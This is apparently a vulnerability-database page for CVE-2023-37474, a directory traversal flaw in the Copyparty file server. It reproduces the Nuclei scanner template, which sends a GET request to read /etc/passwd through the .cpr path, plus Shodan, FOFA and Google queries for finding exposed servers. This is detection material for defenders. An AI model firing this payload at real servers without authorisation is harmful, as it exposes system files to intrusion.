Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-37474
HistoryOct 11, 2023 - 8:22 a.m.

Copyparty <= 1.8.2 - Directory Traversal

2023-10-1108:22:27
ProjectDiscovery
github.com
18
copyparty
vulnerability
directory-traversal
cve-2023-37474
packetstorm
web-server

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.055 Low

EPSS

Percentile

93.3%

Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
id: CVE-2023-37474

info:
  name: Copyparty <= 1.8.2 - Directory Traversal
  author: shankar acharya,theamanrawat
  severity: high
  description: |
    Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/9001/copyparty/
    - https://www.exploit-db.com/exploits/51636
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37474
    - http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html
    - https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-37474
    cwe-id: CWE-22
    epss-score: 0.05882
    epss-percentile: 0.93414
    cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: copyparty_project
    product: copyparty
    shodan-query: http.title:"copyparty"
    fofa-query: title="copyparty"
    google-query: intitle:"copyparty"
  tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a3d764f1deaab0a74aa395664d2c03375128689f44db8ac4feaf8922dc7865e5022031daff978d8f50006c44303b8278c4488897eea780a082bd4bae73abcda826f4:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.055 Low

EPSS

Percentile

93.3%